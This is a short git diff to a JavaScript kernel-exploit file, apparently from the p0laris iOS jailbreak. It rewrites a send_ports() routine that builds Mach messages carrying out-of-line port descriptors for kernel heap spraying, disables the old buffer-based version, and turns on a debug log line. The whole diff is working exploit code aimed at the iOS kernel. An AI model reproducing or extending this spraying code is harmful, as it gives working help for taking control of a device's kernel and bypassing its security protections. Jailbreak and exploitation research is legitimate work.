1 files changed, 25 insertions, 2 deletions

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e761184..68ed794 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -221,7 +221,7 @@ function spray_ports(number_port_descs) {
 
 	ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
 
-//	p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
+	p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
 
 	var ret = read_u32(mp);
 	shit_heap_free(mp);
@@ -250,6 +250,7 @@ function fast_array_mul(arr, n) {
 }
 
 function send_ports(target, payload, num, number_port_descs) {
+	if (0) {
 	var init_port_set = shit_heap(num * 4);
 
 	for (var i = 0; i < num; i++) {
@@ -281,8 +282,30 @@ function send_ports(target, payload, num, number_port_descs) {
 	large_buf[req_head_msgh_id >>> 2] = 1337;
 
 //	p0laris_log("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+}
+
+	var init_port_set = new mach_port_t(num);
+
+	var InP = new Request_sp(number_port_descs);
+	var InP_obj = InP.deref();
+	InP_obj.msgh_body.msgh_descriptor_count = number_port_descs;
+
+	for (var i = 0; i < number_port_descs; i++) {
+		InP_obj.init_port_set[i].address = init_port_set.addy;
+		InP_obj.init_port_set[i].count = num;
+		InP_obj.init_port_set[i].disposition = 19;
+		InP_obj.init_port_set[i].deallocate = false;
+		InP_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+	}
+
+	InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+	InP_obj.Head.msgh_remote_port = target;
+	InP_obj.Head.msgh_local_port = 0;
+	InP_obj.Head.msgh_id = 1337;
+
+	InP.write(InP_obj);
 	
-	var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+	var ret = mach_msg(InP.addy, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
 
 	return ret;
 }